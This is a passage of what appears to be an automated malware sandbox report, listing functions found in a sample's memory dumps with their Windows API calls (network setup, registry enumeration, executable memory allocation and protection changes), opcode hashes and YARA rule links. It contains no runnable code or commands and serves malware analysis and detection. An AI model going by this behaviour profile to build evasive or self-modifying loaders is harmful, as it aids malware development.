Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94105d846eb4ad30c7054736d99b56cb70e122835290b1026b6858b3d276c40d
Instruction ID: c6ff3006838286e9ed05ad7dfd5a0cc7fa662cbc22dd797dcc739187cdf83018
Opcode Fuzzy Hash: 94105d846eb4ad30c7054736d99b56cb70e122835290b1026b6858b3d276c40d
Instruction Fuzzy Hash: 8611E5B1600200AFF7209B15DC85FA6FBA8DF54724F148469FE485A281D6B4A504CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 05373072, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053730D1

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 8e45d449e4f21848bd1e01d79f5818a02af6332e4449a3c62e232969a23a1f22
Instruction ID: b7693f213efc0e81ecf6de05d5f1e3fd0a7f0d40038e482e17bc4cff77540488
Opcode Fuzzy Hash: 8e45d449e4f21848bd1e01d79f5818a02af6332e4449a3c62e232969a23a1f22
Instruction Fuzzy Hash: 241121B1800208AFEB30DF55DC80FA6FFA8EF44720F04885AEE494B251C774A408DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05371A76, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05371ACC

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: ab0ec4b1fe2cb40fc093222c5c4c6a82f735dac69e7e45ecb1b60202820374a5
Instruction ID: b20f402e4aad71e52a2b43158a3599d8823c52073b1471268e7a04eaf5bbe19d
Opcode Fuzzy Hash: ab0ec4b1fe2cb40fc093222c5c4c6a82f735dac69e7e45ecb1b60202820374a5
Instruction Fuzzy Hash: 2401DBB1904704AFEB20CF59DC85F66FBACEF44720F14C456EE485B241D778A504CA75

Uniqueness

Uniqueness Score: -1.00%

Function 053700DE, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 05370126

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 428f3519eb867e133f2dec3ddc8a57ec2c47419df5412c7827c1eaa0b4f3d059
Instruction ID: 6a9102c441211760c6c5a742f4320bb516a36cf09ced8a2b6785f28fc8d6ec2b
Opcode Fuzzy Hash: 428f3519eb867e133f2dec3ddc8a57ec2c47419df5412c7827c1eaa0b4f3d059
Instruction Fuzzy Hash: 1A1165B5A042448FEB64CF29DC45B56FBE8EF44710F08846AED49CB642D674D404CE71

Uniqueness

Uniqueness Score: -1.00%

Function 05370852, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053708A5

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 382ff03f79b7bf413ed4fb3b53033daa40a033f44407367e40a6dde6b9e85547
Instruction ID: af6973cba312353c1c86cc8c8e5b1190fba89f77adbe4ad1861ecc199c6b6f29
Opcode Fuzzy Hash: 382ff03f79b7bf413ed4fb3b53033daa40a033f44407367e40a6dde6b9e85547
Instruction Fuzzy Hash: AB01D6B1904204BEE721CB15DC85F66FBACEF44720F148456EE559B241D678A4048AB1

Uniqueness

Uniqueness Score: -1.00%

Function 05370654, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,6CEF7256,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 053706A8

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: f2bd301728a1634d1bebae5004b974a19a731216f2d9d97dfcd52b1d70f9c6b1
Instruction ID: dbfad95b4e9a3bc84a36ea47ade270267ffa6b6442b26f901bc1601a79ec1702
Opcode Fuzzy Hash: f2bd301728a1634d1bebae5004b974a19a731216f2d9d97dfcd52b1d70f9c6b1
Instruction Fuzzy Hash: A511A5755093C49FDB228F25DC54B52FFB4EF42220F0980DEED859F262D278A848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05373146, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05373192

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 52f02226cbaf35086aa3fb2714a41b77b3e49cf827a2ab0b9263cb17b0f26225
Instruction ID: 81adbc0bf7efc8ac527eb8f8562cd85c2a951ef08fe1dcb3e2614538d8a9a910
Opcode Fuzzy Hash: 52f02226cbaf35086aa3fb2714a41b77b3e49cf827a2ab0b9263cb17b0f26225
Instruction Fuzzy Hash: BD115A719002449FEB21DF55D884B66FBE5FF08320F08C8AAED898B652D375E418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 023AA0BE, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E94,?,?), ref: 023AA10E

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 3be8971801cc45e86eeabd8a85118dd1b7fbef349267c7b9c50a83558a5084d4
Instruction ID: 7ec60eedd7daca3b40243c1b49bff722a094e88cb5ac2949e84aa56bc45ca58e
Opcode Fuzzy Hash: 3be8971801cc45e86eeabd8a85118dd1b7fbef349267c7b9c50a83558a5084d4
Instruction Fuzzy Hash: 5701B171900200ABD710DF1ADC85B26FBE8FB84A20F14816AED088B645E635F915CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 05372EE6, Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E94,?,?), ref: 05372F36

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 851e631252f22d3ffc06fd7b0986120ac5c90be9337d1e889f90152f0b584128
Instruction ID: 50745f9ada85caf3de29bdc0e716d93b4a511185f47c5b13faf26c242a0730ab
Opcode Fuzzy Hash: 851e631252f22d3ffc06fd7b0986120ac5c90be9337d1e889f90152f0b584128
Instruction Fuzzy Hash: CC01B172900200ABD310DF1ADC85F26FBE8FB84B20F14812AED088B645E631F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 023ABEE2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 023ABF26

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0ddbbdd3f16c272623f5a3b39a9c150ecd6133f2a157ffced35f7db5c17c20c4
Instruction ID: ab195306787f8544007f995fcbdf7d751d43e35e7bf08973631c870651abe8fa
Opcode Fuzzy Hash: 0ddbbdd3f16c272623f5a3b39a9c150ecd6133f2a157ffced35f7db5c17c20c4
Instruction Fuzzy Hash: D401CC728003409FDB218F55D844B6AFFE5EF48320F08C9AAEE894B652D371A018CF62

Uniqueness

Uniqueness Score: -1.00%

Function 023AAB2A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,6CEF7256,00000000,?,00000072,?,?), ref: 023AAB5C

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4aae8da9122f55738873cdc1f39a2bcc27f755d63001d10be04ea50112545a86
Instruction ID: 026217dc5adba42c62621707960f5ceedfc30f4bf1cf31da82b6ce7f1d58a8ac
Opcode Fuzzy Hash: 4aae8da9122f55738873cdc1f39a2bcc27f755d63001d10be04ea50112545a86
Instruction Fuzzy Hash: C701A2769152408FEB11CF19D884766FFA4EF40221F08C4BADD498F642D774A448CA61

Uniqueness

Uniqueness Score: -1.00%

Function 023AA772, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E94,?,?), ref: 023AA7C2

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: a9c41f888e6b56685e04299e6f8741fe9236c0c678f1e205e046025e3f619c5a
Instruction ID: 6f18994756d73e447443ddbb24aaa469d2bd7bc8a3dedd6e9457995467088a61
Opcode Fuzzy Hash: a9c41f888e6b56685e04299e6f8741fe9236c0c678f1e205e046025e3f619c5a
Instruction Fuzzy Hash: 9501A272500200ABD350DF1ADC86F22FBE4FB88B20F14811AED084BB45E631F916CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 05371766, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,6CEF7256,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 05371798

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: d76ac32a78da3df3257d2b68914f064d36908df7084f593c157882cab0cefd25
Instruction ID: e918de950ea6fcb0b148231b0c91209d86b54e8c002ef0c7e21df63d75c06250
Opcode Fuzzy Hash: d76ac32a78da3df3257d2b68914f064d36908df7084f593c157882cab0cefd25
Instruction Fuzzy Hash: 4701A7759002888FDB20CF15D885B66FFA4EF40321F18C4EADD49CF642D278A404CA61

Uniqueness

Uniqueness Score: -1.00%

Function 053719DA, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,?,?), ref: 05371A2A

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f15dc927ab1bbe24c498b5a66bb9d858680a3278f148271935836a5081148893
Instruction ID: 0b87af1408a8a5d9dd3e68772e97c355cf3b68cf8bf8b4beacea42a4430b3a0a
Opcode Fuzzy Hash: f15dc927ab1bbe24c498b5a66bb9d858680a3278f148271935836a5081148893
Instruction Fuzzy Hash: 4501A272500200ABD310DF1ADC86F22FBE4FB88B20F14811AED084BB45E671F916CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 053703CA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,6CEF7256,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 053703FC

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d93bbfa4d9523094b1acd1ab2cba9ab08a5a96594f9204e2c9ee7ea72e3f484c
Instruction ID: 4cc14889d5696a8bc51123a241db95e9ba09134a37018e47c462ab3f2ec5d7a0
Opcode Fuzzy Hash: d93bbfa4d9523094b1acd1ab2cba9ab08a5a96594f9204e2c9ee7ea72e3f484c
Instruction Fuzzy Hash: A70184759102448FDB24CF69D888B56FBA4EF44620F18C0AADD498B642D274A458CE72

Uniqueness

Uniqueness Score: -1.00%

Function 053714C6, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E94,?,?), ref: 05371516

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 4d91d60da6225301d244ee9cc065eca1795c13b1a8ad230a8159003868a25c8e
Instruction ID: d8c55f3c6510a90afdd94b0543dbcb956e2b9d395ccb60ff452668bef25f572c
Opcode Fuzzy Hash: 4d91d60da6225301d244ee9cc065eca1795c13b1a8ad230a8159003868a25c8e
Instruction Fuzzy Hash: 3301A272500200ABD350DF1ADC86F22FBE4FB88B20F14811AED084BB45E631F916CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 023AA8E6, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 023AA918

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3a077f95a0039ac692ffb4214b864092a9ba3f70f07bc78fadb91baab47f045f
Instruction ID: f561ebe41bef05b8b4781c721ae23e0bd0631222db709b84ad07f5db1c808822
Opcode Fuzzy Hash: 3a077f95a0039ac692ffb4214b864092a9ba3f70f07bc78fadb91baab47f045f
Instruction Fuzzy Hash: D701AD718002448FEB10CF15D884765FFB4EF40621F08C4BADD488F642D378A404CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 05370676, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,6CEF7256,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 053706A8

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 60421facfc7b0cb4e35da66a5d274121e9cce9bc3ec5d892ee354f0d3e266ba3
Instruction ID: d94aa4f31ac9e3a9222993fd8703b5f9e433edfec71e8955984bdf121d17837c
Opcode Fuzzy Hash: 60421facfc7b0cb4e35da66a5d274121e9cce9bc3ec5d892ee354f0d3e266ba3
Instruction Fuzzy Hash: 7D01F9B5900244CFDB24CF1AD888765FFA4EF40320F18C0AADD595B752D2B9E444CE65

Uniqueness

Uniqueness Score: -1.00%

Function 023AA2DA, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,6CEF7256,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 023AA30C

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: fc45f3910fdd6b746b142d9780efceffdaf3abc16357c7f697a7e5fd7d7e9167
Instruction ID: d29bf0a9d387299acd5cc07fbede315e90c29ecb9f0e095d6254f13ef2c93140
Opcode Fuzzy Hash: fc45f3910fdd6b746b142d9780efceffdaf3abc16357c7f697a7e5fd7d7e9167
Instruction Fuzzy Hash: A2F0AF758142448FEB208F06D884765FFA4EF44720F08C0AADD494B696D375E408CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 004520B9, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 004520E5

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 20739bd80349627239c9336944e4ce065c7ce243a129e12e721232b264645419
Instruction ID: 06f5e541ccfa619a569e8adca393e6cb9c62d802efc787b8b12c04de02e219bf
Opcode Fuzzy Hash: 20739bd80349627239c9336944e4ce065c7ce243a129e12e721232b264645419
Instruction Fuzzy Hash: CBD012260429262616163266AC069DF235C9D03776314402BFE00955A39F9DE98AC1FD

Uniqueness

Uniqueness Score: -1.00%

Function 0044C12C, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0044C141

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d181c7c5d94cf6a9594babd1397aa7a9ec606aec96ce00abcc1aca475a0fa935
Instruction ID: e4e45c70b567f2e8a3e570ca5a339dff4dda5087c7027c312f1e452b20f8ad7c
Opcode Fuzzy Hash: d181c7c5d94cf6a9594babd1397aa7a9ec606aec96ce00abcc1aca475a0fa935
Instruction Fuzzy Hash: F9D05E725543046AEB009F747C09B623BDC9384796F14843AB90DC6292F574C9808548

Uniqueness

Uniqueness Score: -1.00%

Function 0044CF47, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 0044CF49

Part of subcall function 0044CED5: TlsGetValue.KERNEL32(00000000,?,0044CF4E,00000000,0044E256,00456120,00000000,00000314,?,0044C603,00456120,Microsoft Visual C++ Runtime Library,00012010), ref: 0044CEE7
Part of subcall function 0044CED5: TlsGetValue.KERNEL32(00000005,?,0044CF4E,00000000,0044E256,00456120,00000000,00000314,?,0044C603,00456120,Microsoft Visual C++ Runtime Library,00012010), ref: 0044CEFE
Part of subcall function 0044CED5: RtlEncodePointer.NTDLL(00000000,?,0044CF4E,00000000,0044E256,00456120,00000000,00000314,?,0044C603,00456120,Microsoft Visual C++ Runtime Library,00012010), ref: 0044CF3C

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: e14ae9420b38dd1a586b59782a0127514e2e1d93a98967705ffc418167ccb215
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEF44, Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

mXup^, xrefs: 04CFEF4E

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID: mXup^
API String ID: 0-3514231881
Opcode ID: 4b14c8863dcbaa309269ab0cadd2b0e3ebf112e9b334552f8f9ea199aa533631
Instruction ID: 7217e6bea0a20f3bf22e3fa96dca277c0c7f5f8840fa4d7ecb88a4dc9485bc89
Opcode Fuzzy Hash: 4b14c8863dcbaa309269ab0cadd2b0e3ebf112e9b334552f8f9ea199aa533631
Instruction Fuzzy Hash: 7621F734714201CBD758AB78DC1036DB273EB84704F4444ABE64AEB394EF7AAD56CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00451F82, Relevance: 1.3, APIs: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00451FAD

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a3989779290b0735fa2f325269654fe380e90e505c0ac32db9094afd0a1cebbd
Instruction ID: c2eddb5dd67f9f53b53fb55c4abe3bcc4df8bf97d1fcc9eddc74434162c6e112
Opcode Fuzzy Hash: a3989779290b0735fa2f325269654fe380e90e505c0ac32db9094afd0a1cebbd
Instruction Fuzzy Hash: CC21A132A01304ABCB609F9ADD85B5AB7F4BF14709F04446BEA06D7283D678E948CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00451ED9, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00451F04

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aa7aa856faf85cf32e573cfc4910e92655c4692e0ad0303a91f8389232a1f3ff
Instruction ID: 0ebd5e292e05bf706ebc7bb9ab87bae507f225e1b9af12d5954f750ca6819ff5
Opcode Fuzzy Hash: aa7aa856faf85cf32e573cfc4910e92655c4692e0ad0303a91f8389232a1f3ff
Instruction Fuzzy Hash: DE118132A00304EBCB109FA9CC85B9AB7F4BF04709F04486AEA46D7252D778E959CB58

Uniqueness

Uniqueness Score: -1.00%

Function 04CFF03E, Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

]Xup^, xrefs: 04CFF06D

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID: ]Xup^
API String ID: 0-1884771535
Opcode ID: 5b6bb5951eeadd23ff827533462691244d424f8ace3c1377810105c8d23898f2
Instruction ID: cdd7d17310365aa8d26067b6d747f43c524d1c39e7a9af8aa48dbad60ae60659
Opcode Fuzzy Hash: 5b6bb5951eeadd23ff827533462691244d424f8ace3c1377810105c8d23898f2
Instruction Fuzzy Hash: 98F0F071B14101CBC75A9B3D884017DB6ABFBC260436849AEC14A9E354DE3BC9078B92

Uniqueness

Uniqueness Score: -1.00%

Function 004520F0, Relevance: 1.3, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 004520FA

Part of subcall function 0045146C: VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 00451493
Part of subcall function 0045146C: VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 004514BA
Part of subcall function 0045146C: GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 004514C0
Part of subcall function 0045146C: FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 004514C7

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ProtectVirtual$CacheCloseCurrentFlushHandleInstructionProcess
String ID:
API String ID: 2900862000-0
Opcode ID: 2b7868a2601a6dbba58fc9b950585779c58051ffdcaf4b0a23c6340e86d73cac
Instruction ID: 5e619123dac4c10df127acaf37ab7025b5f3bbb45ebfc010c6ff5b13fac75f53
Opcode Fuzzy Hash: 2b7868a2601a6dbba58fc9b950585779c58051ffdcaf4b0a23c6340e86d73cac
Instruction Fuzzy Hash: 7EF02B31500214FFC7019B05ED41A5BB3B8EB4535BF110877E94463223C376DD08CE58

Uniqueness

Uniqueness Score: -1.00%

Function 04CFD550, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bad6469202064962897a4122c834f7a84635c0b23913c86abe997ecede2984
Instruction ID: 95fe68e2620402b506260decba64aae28add33ff69b1220afef965b16a8b9653
Opcode Fuzzy Hash: 29bad6469202064962897a4122c834f7a84635c0b23913c86abe997ecede2984
Instruction Fuzzy Hash: F541E470B14218CFCB949B78C85469EB6E3AB8C354F154839D607EB394EB38EC418B82

Uniqueness

Uniqueness Score: -1.00%

Function 04CFCA1F, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e01cf38bfa95115adee7c235f8b12f1c9401334a70c00e596ef0e2441373091
Instruction ID: 2094f985e40568eeb90ed156b696fa078464cf23b4a383ff023e0daeecb64933
Opcode Fuzzy Hash: 9e01cf38bfa95115adee7c235f8b12f1c9401334a70c00e596ef0e2441373091
Instruction Fuzzy Hash: 69418BB0A5839A9FC385CF25D48521EBFE6BBC6340F44CD1DE29A8A260D7789654CF12

Uniqueness

Uniqueness Score: -1.00%

Function 04CFF720, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84c9b567304acc504bc9bb7524838c12c76e0d49396229a098a5b610da2a02f
Instruction ID: 5f6dd8b15bbb2f0a28a24902e2e3686824001bc06977fa6c91634940519988b7
Opcode Fuzzy Hash: c84c9b567304acc504bc9bb7524838c12c76e0d49396229a098a5b610da2a02f
Instruction Fuzzy Hash: B331F131B10215CFCB94CFB989904EEFBB3EF85304B15842FE606AB251E639E802C791

Uniqueness

Uniqueness Score: -1.00%

Function 04CFD1FA, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f4c39375287db67d752d2a842ff6b39470e4d40e6c5f1c84268103a549ccdf
Instruction ID: 72ee0ad966bbba0e4862abdc9604410ca2f7abc0a11d57024270b89b652f5d6a
Opcode Fuzzy Hash: 48f4c39375287db67d752d2a842ff6b39470e4d40e6c5f1c84268103a549ccdf
Instruction Fuzzy Hash: 09210179B001049BCB859F78ACA82AEBBE7ABC9655F144866D603D7344EB39CC16C790

Uniqueness

Uniqueness Score: -1.00%

Function 04CFCABF, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e818e601bc734c3acc2a1787735c58c6c70d9679fe454b2e0f90ae0a2fb9985
Instruction ID: 35afb88547bab5282aea6333b54b7c6f67e75db6af530c93985d1e1ee7e821ce
Opcode Fuzzy Hash: 5e818e601bc734c3acc2a1787735c58c6c70d9679fe454b2e0f90ae0a2fb9985
Instruction Fuzzy Hash: A8316AB0A18386AFC385CF25D44521EBFE5FBD5380F54CD2DE19A8A260D638D545DF12

Uniqueness

Uniqueness Score: -1.00%

Function 04CFCAA2, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d044bd54081e4e3635793db0779bc4554aa6af78044d4fe721faedf1aaf279c
Instruction ID: c27d79f1a6e73f9e242b3e2b5bf9e8817b817a7727ae7f1bdc260efc87662736
Opcode Fuzzy Hash: 1d044bd54081e4e3635793db0779bc4554aa6af78044d4fe721faedf1aaf279c
Instruction Fuzzy Hash: 3F3147B0A18386AFC385CF25D48421EBFE6BBC5380F54CD2DE19A8A260D638D555DF12

Uniqueness

Uniqueness Score: -1.00%

Function 04CFD208, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b3045dc130b8e3c2e88ce3e7c29d4353b0052cb0360aa4ca0efeebb1122f1e
Instruction ID: 6d402e5456fc5e11d317f3f7f94093ced05b7eb6333dc4784e8d7ec97689f19e
Opcode Fuzzy Hash: a4b3045dc130b8e3c2e88ce3e7c29d4353b0052cb0360aa4ca0efeebb1122f1e
Instruction Fuzzy Hash: 3621D379B002048BCB449E78A8996AEB7F7ABC8754F144826D607D7344EB39DC15C790

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2D94, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504964655.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287d244aabec9a9aa122d65bcc704c0ad43b2ccfce04d07e9f53a08e7ce37c1c
Instruction ID: e53f8aeda35f06c029331c2861e0c635edf4a36b2ca57460c11ab28411752d98
Opcode Fuzzy Hash: 287d244aabec9a9aa122d65bcc704c0ad43b2ccfce04d07e9f53a08e7ce37c1c
